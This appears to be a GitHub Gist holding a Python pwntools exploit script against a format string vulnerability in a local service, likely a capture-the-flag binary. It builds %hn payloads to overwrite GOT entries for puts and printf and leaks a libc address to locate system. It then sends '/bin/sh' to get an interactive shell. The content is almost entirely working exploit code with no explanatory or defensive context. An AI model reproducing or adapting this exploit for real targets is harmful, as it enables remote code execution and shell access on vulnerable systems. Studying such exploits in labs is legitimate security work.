Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import pwn
import sys
def constructPayload(instr):
cPlLen = len(instr)
cPlTotal = instr + "+" * (99 - cPlLen)
return cPlTotal
def confirmHex(in_int):
print "confirm string ok: %" + str(in_int) + "x"
return raw_input(" > ").rstrip()
STAGE1_OVWR = constructPayload("B\x1a\xA0\x04\x08\x18\xA0\x04\x08%2042x]%5$hn%20002x%12041x%6$hn")
STAGE2_LEAK = constructPayload("[LEAQ][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][LEAQ]")
if len(sys.argv) == 1:
print " [!] deploying format string against remote target"
p = pwn.remote("127.0.0.1",5555)
print " [!] sending stage1 puts overwrite"
p.sendline(STAGE1_OVWR)
print " [!] sending stage2 address leak"
p.sendline(STAGE2_LEAK)
p.recvuntil("[LEAQ]")
data = p.recvuntil("[LEAQ]")
print " [+] " + data
offset = int(data[11:19],16)
system_addr = offset - 1626192
print " [!] leaked 0x%08x, i think system is at 0x%08x" % (offset, system_addr)
system_addr_hiword = (system_addr & 0x00FF0000) / 0xFFFF
system_addr_loword = (system_addr & 0xFFFF)
STAGE3_OVWR = constructPayload("B\x0E\xA0\x04\x08\x0C\xA0\x04\x08" + confirmHex(system_addr_hiword - 9) + "%5$hhn" + confirmHex(system_addr_loword - system_addr_hiword - 9) + "%6$hn")
print " [!] sending stage3 printf overwrite... waiting"
p.sendline(STAGE3_OVWR)
p.recvuntil("format string>")
print " [!] okay, sending /bin/sh for printf/system..."
p.sendline("/bin/sh;//")
p.interactive()
p.close()
elif sys.argv[1] == "-p":
print STAGE1_OVWR
print STAGE2_LEAK
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.